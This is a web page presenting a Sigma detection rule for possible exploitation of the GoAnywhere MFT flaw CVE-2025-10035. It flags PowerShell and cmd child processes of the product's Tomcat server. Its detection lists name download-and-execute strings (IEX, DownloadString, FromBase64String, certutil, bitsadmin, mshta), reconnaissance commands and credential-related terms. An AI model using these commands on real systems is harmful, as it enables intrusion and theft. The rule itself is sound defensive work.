Potential Exploitation of GoAnywhere MFT Vulnerability
Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application, which may indicate exploitation such as CVE-2025-10035. This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175.
Convert In Phoenix Studio
Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.
Developed to detect an active or emerging threat. Prioritize investigation of any alerts and correlate with threat intelligence.
Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.
detection:
# Detects the GoAnywhere Tomcat parent process based on path and command line arguments
selection_parent:
ParentImage|contains: '\GoAnywhere\tomcat\'
selection_powershell_img:
Image|endswith:
- '\powershell.exe'
- '\powershell_ise.exe'
- '\pwsh.exe'
selection_powershell_cmd:
- CommandLine|contains|all:
- 'IEX'
- 'enc'
- 'Hidden'
- 'bypass'
- CommandLine|re:
- 'net\s+user'
- 'net\s+group'
- 'query\s+session'
- CommandLine|contains:
- 'whoami'
- 'systeminfo'
- 'dsquery'
- 'localgroup administrators'
- 'nltest'
- 'samaccountname='
- 'adscredentials'
- 'o365accountconfiguration'
- '.DownloadString('
- '.DownloadFile('
- 'FromBase64String('
- 'System.IO.Compression'
- 'System.IO.MemoryStream'
- 'curl'
selection_child_cmd:
Image|endswith: '\cmd.exe'
CommandLine|contains:
- 'powershell'
- 'whoami'
- 'net.exe'
- 'net1.exe'
- 'rundll32'
- 'quser'
- 'nltest'
- 'curl'
selection_child_others:
CommandLine|contains:
- 'bitsadmin'
- 'certutil'
- 'mshta'
- 'cscript'
- 'wscript'
condition: selection_parent and (all of selection_powershell_* or 1 of selection_child_*)Legitimate administrative scripts or built-in GoAnywhere functions could potentially trigger this rule. Tuning may be required based on normal activity in your environment.
Sub-techniques
Other